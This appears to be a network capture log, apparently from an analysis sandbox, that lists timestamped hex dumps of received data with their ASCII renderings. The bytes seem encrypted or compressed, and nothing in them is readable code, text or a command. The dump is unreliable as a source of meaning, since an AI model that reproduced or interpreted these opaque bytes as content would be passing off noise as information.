                                                                                                                                                                                    2023-01-05 07:59:32 UTC19308INData Raw: 36 5c 37 97 3b 14 58 30 3f 68 71 23 81 f5 d9 48 a5 02 a0 ee 0e 38 f9 8e 0a f4 3b 5a 78 fe 62 43 7a ef 57 99 38 90 48 a5 39 5b de d5 7c f1 39 05 c0 7e 53 c8 7f 55 65 77 24 e7 48 f9 ec 25 37 60 a2 b6 92 26 6e ac 55 d8 4a 51 20 0e 1a be 6a de 27 dc 14 9d b7 e7 0a c7 fa 62 21 8a 1f a7 65 07 26 e8 1a 18 d3 44 98 1f e5 09 47 a0 ce 68 1b 0a 3b cf c0 85 d7 53 49 f4 88 b9 c6 be 00 cf e6 76 d3 a9 bc 88 ad d7 4d 92 dd 8c 38 50 be cd e7 82 87 0d e1 70 0f 1e 59 6f b4 05 05 d7 f1 14 8e 29 fa 13 3d f1 f7 dc 24 52 0c 29 ae 24 34 6b b1 9e 08 2d 5e 07 7f 2e b6 4f 06 c7 04 33 63 e3 48 3d 1c d9 64 e0 a6 d1 33 39 60 41 6b dd 43 b2 98 1a 58 f3 ac 5f d1 a2 62 d7 69 c4 c1 69 7d 0b 57 d4 22 a9 22 34 99 53 b5 74 52 22 0f 1a db 40 02 49 c1 85 7a 85 5d 9b 85 cc f8 ca 39 e0 ed 24 8f
                                                                                                                                                                                    Data Ascii: 6\7;X0?hq#H8;ZxbCzW8H9[|9~SUew$H%7`&nUJQ j'b!e&DGh;SIvM8PpYo)=$R)$4k-^.O3cH=d39`AkCX_bii}W""4StR"@Iz]9$
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19324INData Raw: a5 73 45 43 11 7c b6 35 11 2f cd 08 52 38 ba 1c 64 48 89 9d d7 61 fe 2f ca 00 70 85 33 d8 b4 91 fd ae 92 67 53 f9 cf f3 3a 7d 6b 52 58 3f 0f ea 84 6e 33 90 e0 51 78 ad 00 ae 1b 38 63 ac da d2 97 48 19 f5 b9 6f 61 24 a9 6e 12 5e 49 51 d7 78 89 bd ec 00 34 ea 8b ca 89 1b 1e bc 46 d4 f1 95 36 8e d3 ad b7 41 f1 74 8a d2 7d 8d d3 50 c7 c5 12 85 df 9f ec c0 03 65 34 26 d5 d0 e9 27 ea 0f 2d b6 5e ce 16 ac d0 e3 fc 12 0e e8 ea 83 05 82 75 9d 8e 55 5d f2 0f dd 27 0c e0 dc c6 43 76 6f aa 5b 78 46 58 22 da d1 2d fb 89 aa ee a1 2f 37 16 74 31 53 e9 29 e7 72 07 30 3f 68 d1 84 25 13 dc 2c 99 be 5f 18 d6 07 e2 a1 5a 07 8e 97 6b 2c 57 0d d6 f5 62 ec a0 9d 5d f2 90 92 7b 2b b5 d4 96 0a 2b b2 16 03 d6 d5 b7 b7 31 42 37 31 42 75 6a cf 0e e6 8b a3 33 b0 80 82 e0 eb 7e 29 b7
                                                                                                                                                                                    Data Ascii: sEC|5/R8dHa/p3gS:}kRX?n3Qx8cHoa$n^IQx4F6At}Pe4&'-^uU]'Cvo[xFX"-/7t1S)r0?h%,_Zk,Wb]{++1B71Buj3~)
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19340INData Raw: d9 14 c5 cf 0b 49 60 dd 30 33 cc 1d b4 7c d4 84 66 23 57 93 6c 0d e9 69 5c ad 03 55 ce ab 4d 0f 22 ae 07 08 35 36 ad f8 52 e1 5d 2e 99 cf ef 32 35 76 d9 ac 34 dc 29 c2 03 09 ca b0 e8 f1 5c 6c a0 a7 50 48 00 e8 7e da 94 ef 9f 54 d3 e5 81 f0 05 f4 07 1a b0 ad 46 2d 03 29 c8 1e bf 9f d5 61 63 36 32 42 71 3c df f3 fb 54 8d 09 78 46 ac 52 8c 62 1b 75 cc 56 01 64 b0 cb be 93 74 29 73 9c b5 f5 77 f7 51 07 2d a0 44 29 b6 fd c4 c5 f5 a8 f1 e8 6b 9a 9b f1 36 90 be a4 5f 1c 81 ee e4 d8 6c a2 cb e4 57 8d 9d e1 c4 9e 04 96 ec cd 9d 6f 73 17 51 58 7e a1 b8 76 6e cd ca 6e c8 5f 08 33 a7 a5 26 df 6d 7d e9 dc 4d dc 36 46 20 88 03 83 c2 64 bb 5f 0e 32 c0 05 26 5d 0f ae 6c 84 c0 c7 95 fa 52 de 7e c8 7d 72 ba fb 87 06 7f 44 69 bc ce 99 fc 97 81 2b 1d 3d 20 47 96 3d 9d be b2
                                                                                                                                                                                    Data Ascii: I`03|f#Wli\UM"56R].25v4)\lPH~TF-)ac62Bq<TxFRbuVdt)swQ-D)k6_lWosQX~vnn_3&m}M6F d_2&]lR~}rDi+= G=
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19356INData Raw: ed eb 6b 16 62 86 82 26 11 d4 fe 25 b3 b7 7e c9 f2 3b b4 bb 8e e6 a1 74 2f 0f ca d0 37 19 55 96 57 6d 6c 1e b4 c1 64 74 1a df c9 84 74 34 3b 3d 22 7e dd 46 8d 59 e1 2d da 6a 39 65 02 4e a5 5b d5 fd 20 20 ba dd f5 2f 18 94 7a 20 0e 60 b7 30 a4 72 39 68 93 4e 6d 01 b5 68 06 c5 47 f4 e8 f5 84 80 bf 57 d1 f9 de 9a ca 32 86 f6 4b 43 50 43 ec 0e 03 f9 13 35 7e f1 cf 2a 07 29 23 a1 cf ed 1c 92 40 4d fc a2 eb 9a 2c f3 5b cc 1b c7 b1 85 9d 2a f0 0b 14 12 91 8d 96 89 e9 03 b2 96 87 15 7c fb 19 c4 87 a5 15 4b bf 9e cf 84 89 2d 62 8e 1a 78 e0 a5 99 16 31 ad ba b9 a9 82 f4 28 70 0d 05 44 5d 47 b6 a4 0e 19 12 c0 1c 22 8f 08 da 6a 17 20 57 44 84 7c c1 20 30 19 68 3c 3f 4b 99 3d c0 f6 fa 32 9f 77 ef f8 1b ee 06 ff 3a 09 13 e9 fc fb f0 d6 9c db 39 84 46 8a 0e 43 54 9e 0b
                                                                                                                                                                                    Data Ascii: kb&%~;t/7UWmldtt4;="~FY-j9eN[ /z `0r9hNmhGW2KCPC5~*)#@M,[*|K-bx1(pD]G"j WD| 0h<?K=2w:9FCT
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19372INData Raw: 86 99 47 13 b3 2b 62 b6 6c d9 fc ba cb 43 43 5c cb b4 a0 5f 9b 75 7a fc d1 05 46 35 6f 0b 3c f6 7b dc a7 60 b2 65 f7 0b 38 f0 73 6b 94 7d f4 95 73 9d d9 da 58 a9 20 ba 6d 5d 16 98 34 ba 24 11 8a 35 09 00 49 1d 83 27 b1 d7 4b 1c c0 3b 72 1a 01 d4 49 d7 b5 bc e9 e8 2c 3a fc 2e 50 44 64 01 d4 0d 94 f5 0d e0 3c 64 e1 fc 3c fe 67 51 cb 93 61 8d 01 72 b0 e7 5a 8f b6 cc da 20 dd 8a 8c 27 49 26 e6 c2 4c d2 6e c9 7b d5 58 eb b2 2a 6a 96 2c 3b d3 61 a2 56 42 6c b8 0a 49 ed 55 21 25 ed 33 65 69 dd 78 b3 47 38 bf 59 1d 0a 88 42 c5 65 59 88 a0 53 fc a8 bf 29 53 b3 f2 ff 4c a1 24 4e 39 6f ec 01 eb dc be 63 34 38 23 a5 a0 a0 a7 39 79 d9 79 82 73 d0 24 94 3a 01 5e 25 35 8b 40 a1 22 42 7b ef 71 0a f7 79 5d b9 12 7c 91 c1 ce 68 53 80 55 52 2f 3c 38 a1 0c cc 88 55 02 d3 d2
                                                                                                                                                                                    Data Ascii: G+blCC\_uzF5o<{`e8sk}sX m]4$5I'K;rI,:.PDd<d<gQarZ 'I&Ln{X*j,;aVBlIU!%3eixG8YBeYS)SL$N9oc48#9yys$:^%5@"B{qy]|hSUR/<8U
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19388INData Raw: 1a 8e 6b 33 19 97 ae 23 95 d2 99 5c 5d 37 3e 81 52 ac f4 1c b1 23 f1 7d 76 da e2 7c cd e4 37 db 12 12 61 e4 21 11 e6 f3 69 4a fd 15 94 c9 59 ee 5f 14 fd 69 94 d7 13 97 5d 03 58 cc 7b 5c c8 74 1a e5 82 38 73 d8 a9 d5 4d 97 29 f1 6f c3 7a eb 52 0f a3 7e 16 85 0f 18 ea d9 40 89 b5 3e bd 53 fc fd d0 79 b6 1f e3 8c f9 7c f6 a6 31 d0 6a 1e ff ae d9 5b 68 49 a3 bc 70 43 ac 64 c4 f5 3c 7e 11 fd f7 05 bc d1 c9 25 41 da 50 75 d5 ee f3 31 14 ac ab 37 d9 2a 68 87 66 18 d6 d5 ae e5 62 91 e7 dd 42 f0 46 33 5c 68 b7 de 04 cd 9f f4 f4 e5 1b 5f 88 9a 14 8f 13 a7 4a 6e ce e0 a9 f2 0e 4d 73 9b 13 23 76 54 6c 13 82 46 ea e1 9c 32 71 13 29 6e d8 28 1f eb 26 07 4c 47 c7 97 c7 79 cc b9 c2 6f 7d ae 1f 45 d0 86 72 4e 5b e8 76 49 18 86 d0 5b d3 86 fd d8 1b 67 39 df a7 6e 58 8c 1f
                                                                                                                                                                                    Data Ascii: k3#\]7>R#}v|7a!iJY_i]X{\t8sM)ozR~@>Sy|1j[hIpCd<~%APu17*hfbBF3\h_JnMs#vTlF2q)n(&LGyo}ErN[vI[g9nX
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19404INData Raw: 7d e9 a2 96 86 3c 5d dd 36 05 ae fa ff 2d c4 79 3c 0d 8a c1 93 e4 5e 62 3f 65 fd d3 21 df 6d 26 ab d5 f4 67 44 b4 a5 38 ff 5d 17 02 2c e4 66 b6 db ec 98 b8 a2 b1 78 96 39 ae ae 13 2c 2f cc 9a 7f 87 51 11 71 af 3c 58 88 2f 26 fd c9 f1 62 7d f6 d2 22 5e 0b e4 5e a1 13 3c f8 c3 67 5f fa 7d 46 5b 2b 6f 6e aa ca 35 ab bd 16 1c a9 f1 de 4c 29 4c ba a7 3c dc f8 69 ca 0a 5b b8 1f 21 db 9d f3 43 53 82 7a 78 ed 4e a1 e8 89 e3 b6 51 c3 82 d6 cd 5d 3a 00 01 8d ce 89 81 ff 77 8f 86 26 ee 12 36 fb 51 a4 59 a9 25 e9 3a 34 83 c8 65 9d ae 32 7b c5 e7 e0 8f 04 ef fd e9 9b 07 90 6b a5 b6 93 0b 67 f3 7c 3a e1 6e 2c 5a 27 53 ea 70 7e bd 38 e0 fb 28 b3 b7 c7 07 49 79 86 ee 72 16 ae 2c f9 52 7a 11 88 7e b1 20 9f 98 de 5e 45 06 e3 37 be 8b e4 d6 7c e4 0d bd a2 f3 fe a2 c4 23 f5
                                                                                                                                                                                    Data Ascii: }<]6-y<^b?e!m&gD8],fx9,/Qq<X/&b}"^^<g_}F[+on5L)L<i[!CSzxNQ]:w&6QY%:4e2{kg|:n,Z'Sp~8(Iyr,Rz~ ^E7|#
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19420INData Raw: 12 37 c5 e8 03 1d c3 cd 4a 9c 86 86 ed 0e 92 0e 41 02 9a 99 83 a4 b4 f5 76 d8 56 e3 74 fa ba 7e b0 b9 33 48 d3 6e 16 3b 51 72 64 3f 07 0e 63 2a 66 7a ba 38 38 67 cd 8c db d3 57 fa 0e ba 64 98 d1 fc 7b 76 8b 97 35 c2 ed 54 dc 2e f0 03 b4 b0 56 a2 24 cb 53 0f 0a 81 15 20 cb b8 8e 70 03 84 9f d0 07 c9 d2 1a 2a fb d3 1d c5 78 f0 a3 82 86 33 37 6d 0e 2c ff 68 d0 77 a6 7c cf 1f 78 f1 80 e2 12 41 9f 6a 54 d0 3f 1d fe 9b 7f 08 cf f0 1f 66 d4 27 5a db 05 78 c8 06 14 5a 6d 19 2f 8a a5 d3 14 17 88 9a 97 27 7e 5e 5e de b1 06 c8 be 70 d7 87 dd 54 83 7e d2 35 02 da 59 1a a5 7a ce 20 db 7f 72 e7 33 55 fb b8 85 30 e7 0e 55 97 52 de 2b ee 5d 2d d8 e7 b4 af 5e ec 94 c3 fa d9 b1 6f 73 d8 d9 56 2a 6e 28 95 c0 03 d5 51 9e ac da 25 8d b4 0a 2f ab df f1 5d 3c ee 16 e5 ba da 73
                                                                                                                                                                                    Data Ascii: 7JAvVt~3Hn;Qrd?c*fz88gWd{v5T.V$S p*x37m,hw|xAjT?f'ZxZm/'~^^pT~5Yz r3U0UR+]-^osV*n(Q%/]<s
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19436INData Raw: 5e cf 07 ad 3f ba a7 fb f6 f6 04 89 68 5e 00 ee 6e 9e 90 a5 09 13 bb 97 b1 f7 de b2 a8 cb 12 5b a3 bb eb a7 8f b3 8b 41 35 62 bc a3 a0 db ac 39 d6 fe fb f7 a1 c8 c2 df b8 ca 52 f3 b7 22 0e 51 a8 fb 76 65 68 00 18 e5 2b af cd d8 17 ab e9 3d 18 e6 c3 f9 4d f9 66 6d aa 24 a0 0d cf 71 18 93 55 8b d5 b3 fc ff de fe 8d e0 1c bc ed 9a 33 54 ec 54 5a 81 0b fc f8 93 fa cf 0f 77 c6 30 fd cb bc d7 b0 82 55 6c 1d 0d 0f fd 46 cf 81 5c fb 26 a3 2d a5 99 90 4b 9a 49 c6 d3 a8 fa 96 9b c2 6b 8c 14 b6 62 94 9a df 9d 5b 74 b2 a2 47 11 2e db 76 02 0e 81 7e 31 13 78 fc 8e 81 26 60 a0 33 ad c5 bc 0b 8c 20 2f 9d f4 44 d8 30 21 47 d6 e5 51 8e 32 ac 20 b8 97 0b c3 ba 80 b4 5c 0a 49 a7 83 ac 6a d6 0b 9d 51 f5 9c a4 7e 59 01 17 be 1a ec f8 d8 fc af 22 a9 dc 30 1f a5 c9 80 87 32 72
                                                                                                                                                                                    Data Ascii: ^?h^n[A5b9R"Qveh+=Mfm$qU3TTZw0UlF\&-KIkb[tG.v~1x&`3 /D0!GQ2 \IjQ~Y"02r
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19452INData Raw: c1 2d fb 30 ad 02 da 2a 6a ee e2 7f 8a 4f 4f ab 06 d7 6c 9e 8b 43 9d 35 49 47 b8 35 25 ab ca 8f 9a 4e a6 9a b8 63 99 20 db 09 1c ac 13 7e 55 cb 11 0f a8 c5 71 1b fa ac 24 7a fe d9 c2 26 41 1c a3 db 27 ea 95 ab 6f db 72 91 ff d2 0b ea fb 15 20 b4 d9 16 83 91 c3 a7 18 9b 88 67 7a d8 84 51 02 2d ce da c6 bb c9 80 e9 a7 cc a4 45 29 f6 a3 76 4b 31 d3 bd ea 13 14 bc 65 23 8c 55 03 c2 20 9b b0 af d5 c2 c2 f4 98 8e 9e ca 9d 18 b0 be 69 20 3d 03 4c 9a a0 e9 f1 d7 4e 49 29 4d 6f 2b 36 c4 e0 63 a1 66 cb 19 53 db 40 8d b5 01 e0 3d f8 30 9e 76 b9 94 38 36 c4 d0 bf af 02 78 bb a5 b7 6d d7 73 23 51 e5 de d4 f4 d7 39 25 99 5a 29 38 e2 38 fe 93 a9 d8 28 2a 84 de cb cc 74 29 90 6c c5 50 bd 2d a7 45 18 54 11 b5 6d a0 8c 21 53 93 d7 29 60 50 e7 f8 98 b3 87 a1 12 5f 19 34 d2
                                                                                                                                                                                    Data Ascii: -0*jOOlC5IG5%Nc ~Uq$z&A'or gzQ-E)vK1e#U i =LNI)Mo+6cfS@=0v86xms#Q9%Z)88(*t)lP-ETm!S)`P_4
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19468INData Raw: ce 0b 94 81 d3 6e db 34 8b 35 e6 a3 fe 01 ae f2 09 17 3b 53 6c 31 47 8d 11 75 f0 59 a3 d7 21 56 62 13 b7 38 4a dc 0c 6f 75 68 f4 2e 0b ca ef b6 54 e8 aa 72 d2 db b6 90 c4 c8 77 03 8d da 4b 4a 3f 83 dc 6c 59 d2 67 67 0b 97 d1 37 47 bb 6d ab ea 50 cb ff ab ad 16 06 52 e2 fe 2e 39 87 d3 b6 9c e4 87 5a 1e 08 7b 3b 87 3e d6 52 fa 1e d5 c7 df 42 41 c9 e2 3d 4b 7c e3 9d fb 56 f9 e3 fd e2 96 b8 36 8d 03 d7 13 2f 7c b9 19 68 33 4b 59 27 ff de 72 6e 77 0c 57 e7 d2 bd 92 a5 f7 32 da 1d d1 6a 4d 05 8a ea 35 b9 ae d5 0d aa 6c 97 b1 8b 20 2e 6b 3b 5c 79 34 59 8b a0 94 00 9b 30 29 d8 57 52 58 d3 0f 5d 07 24 28 72 c3 5e 82 41 44 ef 0f d5 a8 96 9d ec 61 08 ce 66 58 f1 97 f2 da fb fa d4 27 96 37 b8 a7 bd d0 67 e6 e3 0c ec 5f a6 28 17 38 28 7c 82 7b 90 86 68 0b c8 45 f8 02
                                                                                                                                                                                    Data Ascii: n45;Sl1GuY!Vb8Jouh.TrwKJ?lYgg7GmPR.9Z{;>RBA=K|V6/|h3KY'rnwW2jM5l .k;\y4Y0)WRX]$(r^ADafX'7g_(8(|{hE
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19484INData Raw: 17 b4 de d5 53 e1 95 a9 23 56 07 09 57 87 52 87 2f e4 5e be 34 22 b7 6e a7 d0 00 ec ef 5c 74 81 d4 7f fc 69 0f ba 47 52 b9 13 1f cc ee 58 a9 35 65 bf e4 ed a9 c2 23 15 a9 4a 9f 56 c8 10 92 17 92 78 c6 38 7e af 37 ee a0 19 76 0a 99 8d 48 e6 4e d0 c3 98 89 aa af 29 a5 89 1b f6 85 c7 b0 91 4a 6c f5 8f 7a c8 e0 60 cf 41 18 e0 17 e9 30 30 23 b7 ea 0f c1 2a 04 2b ae 53 b0 bd 6b 67 a4 79 f7 a3 87 b8 5a 0b 12 23 d0 69 ee b9 20 de 51 ac 08 5a 9f a1 ca 12 c0 90 4b 36 52 26 62 a3 0d a4 61 af f8 17 38 ec df 4f 71 4a 9d c0 33 65 38 bb 13 7b ea 6b a3 05 41 f6 26 5c 41 32 7c 90 f7 60 ca 72 fb b2 60 72 57 fe 02 1d 2c 75 60 76 16 72 d1 e4 64 38 43 26 32 1a 6a d0 81 c2 51 bf 1b c4 19 7b ec e2 73 3b 5c 2a 14 78 3e 5b e9 82 61 62 e6 0e 71 1a 82 99 10 72 ee 1f 07 d4 19 9f 12
                                                                                                                                                                                    Data Ascii: S#VWR/^4"n\tiGRX5e#JVx8~7vHN)Jlz`A00#*+SkgyZ#i QZK6R&ba8OqJ3e8{kA&\A2|`r`rW,u`vrd8C&2jQ{s;\*x>[abqr
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19500INData Raw: ae d8 bc 49 8a 02 18 24 ad 20 2e d1 41 98 ed ee da f8 34 6c 73 72 86 7f 91 76 c0 2e 17 69 01 7a be 19 51 7e 10 fd 42 dc 0d 02 be 0f 0c c3 9f d3 55 19 8e a4 17 2e e3 7a aa 07 5a de df 4c c4 af 9e f6 40 f1 83 b6 ac 61 a9 55 1f d0 81 86 80 b2 45 2f 0a c3 34 06 f6 89 61 6a d1 a9 86 47 50 b4 8e a1 34 cf ec b1 a0 44 7c 30 c1 ad 58 23 d2 c3 ed 04 d0 bf ae e4 ac df 55 f5 c7 ce 06 20 8d 02 e5 f5 20 14 0c 47 80 66 7a 4c 46 7f 40 63 8e 3f a0 71 72 67 a3 cb 2f 6b 21 ed 04 a3 e6 39 89 92 25 89 89 03 fe cb 6e 10 79 5a 78 38 1f df 07 c0 19 e4 74 3e 16 37 f4 67 5b 4d 98 55 0e 52 52 23 07 15 aa 25 29 47 da b2 59 dc bf 7a 67 38 11 62 48 54 22 b6 cf 02 75 9d 81 5d cb 16 c7 e1 16 56 ae dd 8f e2 84 5a f3 73 5b 70 87 2c 63 80 cd 2b ca 90 f5 74 c4 a1 b7 a6 d5 c4 64 4b 7c ef ba
                                                                                                                                                                                    Data Ascii: I$ .A4lsrv.izQ~BU.zZL@aUE/4ajGP4D|0X#U GfzLF@c?qrg/k!9%nyZx8t>7g[MURR#%)GYzg8bHT"u]VZs[p,c+tdK|
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19516INData Raw: 0c ba 53 91 e4 9f 5e d4 02 4d bb 65 ac 35 90 53 0d e1 a7 75 68 b7 25 76 54 6f bc 91 a6 0f 14 8d 80 fa 22 83 96 e7 5e 38 8a 76 94 96 b7 1d c1 93 a3 c8 c4 66 74 e9 10 ed 85 2c bf db 3d 8e 97 5b 75 d0 3c 94 96 eb 9f 3f 32 b8 5d a4 61 60 e1 53 36 c6 b2 49 e1 bc f3 e9 ad a7 5e ce 8f ac 0e e2 a5 5f 5a 51 dc 02 23 09 ad 09 78 07 6d de 55 7b 07 ed 84 a1 d2 8a bc ff 41 6f eb 3a 38 d0 ba f1 87 af 92 e1 91 a4 c1 66 10 cb fa d6 70 da 9a b3 2f bc eb 6b 0c 6b 3b a6 f6 59 af a3 8a c5 e1 ea c3 ae eb 41 00 3b 26 ac d5 6d fe 62 ca e8 2f a8 d9 75 ba 67 a0 d2 a8 23 24 a9 da 5e ad ed 3c c3 62 52 45 3b 9a 66 df d6 7c 89 4b 20 07 9b 49 3c 6d 16 48 17 bd b0 f3 4e 83 48 14 4e a4 1e 76 1f 61 d5 b4 ee 1d 54 20 50 21 32 54 91 46 89 6e 9a fc 0a bc 49 77 e7 0c c2 77 6e 4c 64 6c 1c 5d
                                                                                                                                                                                    Data Ascii: S^Me5Suh%vTo"^8vft,=[u<?2]a`S6I^_ZQ#xmU{Ao:8fp/kk;YA;&mb/ug#$^<bRE;f|K I<mHNHNvaT P!2TFnIwwnLdl]
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19532INData Raw: 5b 83 52 08 78 55 25 83 fe 06 65 48 2e c1 73 0d e8 e7 5c 89 f6 f0 59 a2 fc 56 1f 61 07 49 c8 bb 33 c5 d8 40 1e 7e 19 2b bb 63 8e 81 c6 c6 1b 5d 1b f8 af 29 17 15 4a f6 e9 db 21 47 96 7e f5 bf be c3 36 5e 90 ca ee 5c d6 ed ae 89 27 ec 3f 2d 1a ad c1 66 93 0b f1 10 cb 34 18 7b c9 46 96 10 32 e1 d5 a9 72 3f 62 fd 92 32 61 93 2b 36 42 6f a0 78 39 71 fb e2 7e 53 79 a6 39 4d 43 bc 1a 18 78 f1 7d 34 7c 40 b0 dd 86 35 d8 7a c7 52 67 d1 3b 04 73 ba f2 b0 6b e7 d4 30 92 a8 a3 67 fb 8c 92 00 72 33 61 7e 0f 6d ad c7 88 3d de fb 8d 9a 2f 7f 97 4b 16 0e 1a b4 6c ab 4a 62 f6 d3 a2 b8 8e 00 96 6b af 75 d3 75 d7 04 f8 5a 0a bf 0b 85 0f c2 cd fa 49 f9 26 be bd 84 a5 1e 11 50 d4 d3 fb d0 b9 32 e7 a0 68 fe 65 66 21 49 cb 40 a4 ab 56 a4 8b ac 15 d4 82 8a d1 40 81 1a b3 2d ea
                                                                                                                                                                                    Data Ascii: [RxU%eH.s\YVaI3@~+c])J!G~6^\'?-f4{F2r?b2a+6Box9q~Sy9MCx}4|@5zRg;sk0gr3a~m=/KlJbkuuZI&P2hef!I@V@-
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19548INData Raw: 73 4c d1 94 67 2e 66 74 fc 82 c0 88 cd eb 52 52 97 80 84 93 ec f1 56 a8 33 ee b6 94 48 eb bd e3 25 3e c2 fc 80 6e 8a 67 97 7f ae b6 5c e5 43 4f f3 db fe f0 72 19 7e 9e 66 fa 52 39 cb 46 5a d4 a1 46 30 e2 2c c9 d4 7b e1 3d ca e8 19 90 3c e2 18 2c 9b 6d 18 9e d8 f4 cd a4 c8 c6 b2 ef 8e e6 d3 99 52 e0 e3 9c f6 a4 52 56 ea 8d 85 b6 5c e3 63 d5 d3 48 fd e4 09 eb 8e 40 cb 79 17 87 bf 1f 20 8c b7 9a 62 85 ab 2c 8c 88 b4 de e4 b4 71 8d 04 a0 8c 12 ea 66 bf 0c 2d 7e 0b 4d 5e 23 ad bb 7c 62 8f 71 51 cb 6b fe 53 c5 e7 16 04 d1 ed f6 2f a7 01 de 9c d1 6c f9 d1 94 e8 fb be 80 e5 65 d0 d3 8f 18 d5 70 24 85 c4 33 f2 49 38 25 be 2d a8 40 86 36 ad 42 3b e5 be e2 29 6a 38 df e5 63 6c 8f d1 8d 58 0a 75 e6 d1 cc 1d 72 a2 c5 2e e5 4b 70 f7 9c 76 7b 41 4f 1b 92 fe 5a 41 53 e3
                                                                                                                                                                                    Data Ascii: sLg.ftRRV3H%>ng\COr~fR9FZF0,{=<,mRRV\cH@y b,qf-~M^#|bqQkS/lep$3I8%-@6B;)j8clXur.Kpv{AOZAS
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19564INData Raw: dd 7e 41 90 16 42 35 10 72 ce 76 7b db 71 2f 9a 01 62 1e 77 39 0d 9f 19 9b 2b 17 e7 79 e9 9a 5d 32 07 e7 d3 4b e8 57 41 21 66 87 be 79 50 a0 7c 3e 7f a6 b6 20 0b a0 7a af a0 59 a6 5d 6b d1 14 a9 d1 e4 a9 10 6e d9 42 98 f8 38 dc d1 82 49 5a eb 1a 99 69 cd 63 28 9a cc 2a 43 54 92 83 01 10 b7 6b f0 d8 5f 3d 4d f0 d5 af bd 02 76 61 77 1b e0 a0 9b 82 84 22 2b 04 26 c7 15 f3 1f 7e 86 ce 45 4e 30 1b d4 48 72 53 c8 22 3d 62 ae 6c 40 16 d4 f3 d6 f9 08 97 f8 76 ea 5c 8a 97 da e3 15 6d e9 84 38 6b 74 1e 62 a8 60 c9 01 a0 c3 71 3f fa 14 6a 3d be 91 57 d7 4a 74 da 9d 32 f6 2e 50 dc 0e eb cc d2 de 68 fe c6 99 d2 93 e8 ff fb 0c d4 c8 cb c2 eb 82 14 85 88 1f 1d 31 a9 c3 c1 07 6d 44 8e e2 11 dd de 0e d7 c3 e1 25 3e 99 3a 93 b8 d0 ec 9e 1d f8 0d 3b 05 1a 6a ff f8 9f 7e 42
                                                                                                                                                                                    Data Ascii: ~AB5rv{q/bw9+y]2KWA!fyP|> zY]knB8IZic(*CTk_=Mvaw"+&~EN0HrS"=bl@v\m8ktb`q?j=WJt2.Ph1mD%>:;j~B
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19580INData Raw: 71 9e 42 75 fd 25 c2 ae 3f ce 12 8d f0 43 f6 5e 94 4a 3e b5 d3 11 ff 67 a7 40 47 3d b6 5f 08 98 12 db 8b ee eb 18 43 df ca d9 d4 33 71 9b 68 12 91 7b 8d 59 a5 1a 45 c0 65 5c 08 1f af a7 19 f1 8e 45 e1 81 34 75 2a c7 fa f6 2b b9 48 b9 ff fb ec ce 1d 6e 89 87 57 6a a5 6b 2f 05 6b 56 1f 8e 72 c5 ed 00 5c 13 3d 9e 61 93 0e 34 d2 d5 c5 4c fe d0 cb 90 b1 ac b6 52 61 8b 86 f5 e3 03 fe 9c 92 45 39 cb cd c7 70 03 6c 25 02 49 39 5c 7c 9e 7b 5d ee 07 95 7b d4 c5 d3 73 26 6d 50 79 cb 37 58 8c 2a bb 01 34 f8 e6 cf 7f ac 86 bb ff e3 0b f8 4d ea ba 08 39 a5 34 07 3a a3 4a d0 4b 2b 8b 65 47 2c 35 81 be e6 1f 11 9a b5 19 5d e3 06 df 21 c3 ed 64 3e 61 c4 05 77 e3 be fe 2c 5b 9c e6 5d d2 0d 85 0c 26 3e 6c 34 97 bb 23 0d c8 7d ac 7e 6d ad 40 04 8a 99 41 c8 69 62 c1 ac ad 86
                                                                                                                                                                                    Data Ascii: qBu%?C^J>g@G=_C3qh{YEe\E4u*+HnWjk/kVr\=a4LRaE9pl%I9\|{]{s&mPy7X*4M94:JK+eG,5]!d>aw,[]&>l4#}~m@Aib
                                                                                                                                                                                    2023-01-05 07:59:32 UTC19596INData Raw: 08 b5 8f b7 08 cf 80 0c 96 e5 a1 69 14 b1 9b 0c 02 bd bb 5d 90 89 87 7b 01 db 87 2f e0 fe 42 b2 ec ca 72 e1 b9 1e c9 57 a9 60 7a 1b ef d6 94 0d db ff b9 ed 59 67 c0 0d 79 53 c6 70 42 8a 81 48 ac 3f fa ad db 89 fb 92 ff 06 26 a4 53 30 17 29 34 cb 84 e9 56 ec 99 9d de 53 7b 6c 1c 2b 7d 51 f7 b0 c6 ef d9 ae 17 5d fe a5 dd 8c 24 62 85 56 48 40 85 0c 49 da f8 2a fc 54 41 69 f9 f9 40 bb 92 fd 0f d6 85 b3 d9 c5 2f d1 63 d4 fc a2 89 08 9a 39 13 71 f1 05 18 13 b1 5c 61 5d d3 96 f8 67 72 92 29 90 ba c5 68 8d 25 a9 96 30 6f e3 77 87 59 c8 69 7d 35 b7 a1 d9 7c ed 4d c0 0d 25 47 69 b0 6e 6c 52 41 3a 6f cc 6a 82 c0 5b 33 c3 c6 85 26 38 fd 84 75 0b 9a 07 65 e8 32 fb 48 6f 94 ce 5b 7b b2 b2 30 0f e6 27 7c 4f b3 74 fc 82 24 2b ee 63 da e3 aa c5 ad 43 fe 88 e0 3b 05 44 ae
                                                                                                                                                                                    Data Ascii: i]{/BrW`zYgySpBH?&S0)4VS{l+}Q]$bVH@I*TAi@/c9q\a]gr)h%0owYi}5|M%GinlRA:oj[3&8ue2Ho[{0'|Ot$+cC;D
